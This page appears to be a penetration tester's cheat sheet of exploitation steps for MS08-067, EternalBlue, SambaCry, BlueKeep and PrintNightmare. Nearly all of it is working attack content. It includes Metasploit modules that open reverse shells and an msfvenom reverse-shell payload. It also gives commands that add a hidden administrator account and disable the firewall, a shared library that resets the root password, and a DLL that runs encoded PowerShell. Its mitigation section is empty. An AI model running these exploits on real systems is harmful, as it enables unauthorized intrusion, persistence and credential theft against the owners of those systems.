# Low-Hanging Fruits ## net\_api **CVE-2008-4250, MS08-067** Check: ``` $ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445 Or msf > use exploit/windows/smb/ms08_067_netapi msf > set RHOSTS file:smb.txt msf > check ``` Exploit: ``` msf > use exploit/windows/smb/ms08_067_netapi msf > set RHOSTS file:smb.txt msf > set LHOST eth0 msf > set LPORT 1337 msf > run ``` ## EternalBlue **CVE-2017-0144, MS17-010** ### Unauthenticated (FuzzBunch + Wine) * * * * * ``` $ python2 fbcli.py eternalblue --TargetIp 192.168.1.11 $ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function Ping $ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function RunDLL --DllPayload /tmp/createuser.dll --ProcessName spoolsv.exe $ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function Uninstall ``` ### Authenticated (Windows 2003 or R/W Pipe) #### MSF Check: ``` $ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445 Or msf > use auxiliary/scanner/smb/smb_ms17_010 msf > set RHOSTS file:smb.txt msf > set THREADS 25 msf > run ``` Exploit with: ``` msf > use exploit/windows/smb/ms17_010_eternalblue msf > set RHOSTS file:smb.txt msf > set LHOST eth0 msf > set LPORT 1337 msf > run ``` **EternalRomance / EternalSynergy / EternalChampion** Exploit with `ms17_010_psexec`: ``` msf > use exploit/windows/smb/ms17_010_psexec msf > set RHOSTS file:smb.txt msf > set LHOST eth0 msf > set LPORT 1337 msf > run ``` Exploit with `ms17_010_command`: ``` msf > use auxiliary/admin/smb/ms17_010_command msf > set RHOSTS file:smb.txt msf > set COMMAND "net user hax0r Passw0rd! /add && net localgroup administrators hax0r /add" msf > run ``` #### Manually * * * Send MSF payload and execute it with `send_and_execute.py`: ``` $ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe $ python send_and_execute.py 10.10.13.38 rev.exe ``` Or just execute commands on host via `zzz_exploit.py` (at least one named pipe must be accessible on target): ``` $ python zzz_exploit.py 192.168.1.11 ``` {% code title="zzz\_exploit.py" %} ```python def smb_pwn(conn, arch): service_exec(conn, r'cmd /c net user hax0r Passw0rd! /add && cmd /c net localgroup administrators hax0r /add && cmd /c netsh firewall set opmode disable') ``` {% endcode %} {% hint style="info" %} For x86 EternalBlue shellcodes use [AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010) (very unstable). {% endhint %} A feature for grabbing registry secrets in one shot: ``` $ git clone https://github.com/worawit/MS17-010.git && cd MS17-010 $ git checkout -b smb_get_file 83b3745 $ wget https://gist.github.com/snovvcrash/e910523a366844448e3a2b40685969e7/raw/e00b7b04aa5c96b0e5f21eae305448cf3c2fd4fa/zzz_smb_get_file.patch $ git apply zzz_smb_get_file.patch ``` ## SambaCry **CVE-2017-7494** (Samba 3.5.0 < 4.4.14/4.5.10/4.6.4) ### MSF ``` msf > use exploit/linux/samba/is_known_pipename msf > set SMB::AlwaysEncrypt false msf > set SMB::ProtocolVersion 1 msf > run ``` ### Manually * * Compile `.so` SUID shared library: {% code title="pwn.c" %} ```c // gcc -shared -fPIC -o pwn.so pwn.c #include #include static void pwn() __attribute__((constructor)); void pwn() { setresuid(0,0,0); system("echo 'root:Passw0rd!'|chpasswd"); } ``` {% endcode %} Get real share path on the target's filesystem: ``` $ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37 path: /home/snovvcrash/sharename ``` Upload `pwn.so` to target and then run the exploit: ``` $ pip install virtualenv $ virtualenv -p /usr/bin/python2.7 $ source venv/bin/activate.sh $ pip install -r requirements.txt $ . venv/bin/activate $ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p '' ``` ## BlueKeep **CVE-2019-0708** Check: ``` msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep msf > set RHOSTS file:rdp.txt msf > set THREADS 25 msf > run ``` Exploit: ``` msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce msf > set RHOSTS file:rdp.txt.txt msf > set LHOST eth0 msf > set LPORT 1337 msf > run ``` ## PrintNightmare **CVE-2021-16751, CVE-2021-34527** * * * ### Check #### CrackMapExec * ``` $ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M spooler ``` #### ItWasAllADream * ``` $ poetry run itwasalladream -d megacorp.local -u snovvcrash -p 'Passw0rd!' 192.168.1.0/24; cat "report_`date +'%Y_%m_%d_%H%M'`"* | grep -P '\d+\.\d+\.\d+\.\d+,Yes' ``` ### Exploit #### C/C++ RCE (fork of the original repo): * LPE: * #### Python RCE: * * * **Usage** 1. Prepare [an SMB share with anonymous authentication](https://github.com/snovvcrash/PPN/blob/master/pentest/infrastructure/ad/smb-rpc.md#smb-share-with-null-authentication) allowed (`smbserver.py` also works): 2. Generate an evil DLL: a ะก2 stager / add user to a privileged group ([1](https://github.com/newsoft/adduser), [2](https://github.com/calebstewart/CVE-2021-1675/blob/main/nightmare-dll/nightmare/dllmain.cpp), [3](https://github.com/calebstewart/CVE-2021-1675/tree/main/nightmare-dll), etc.) / invoke a [custom](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking#your-own) command (see example below). 3. Run the exploit: ``` $ python CVE-2021-1675.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 '\\10.10.13.37\share\pwn.dll' ``` {% code title="pwn.c" %} ```c // x86_64-w64-mingw32-gcc pwn.c -o pwn.dll -shared #include #include #include // Default function that is executed when the DLL is loaded void Entry() { system("powershell -enc "); } BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Entry, 0, 0, 0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } ``` {% endcode %} {% embed url="" %} #### C\# RCE + LPE: * #### PowerShell LPE: * ### Reproducibility Flowchart by [@wdormann](https://twitter.com/wdormann): {% embed url="" %} ### Mitigation *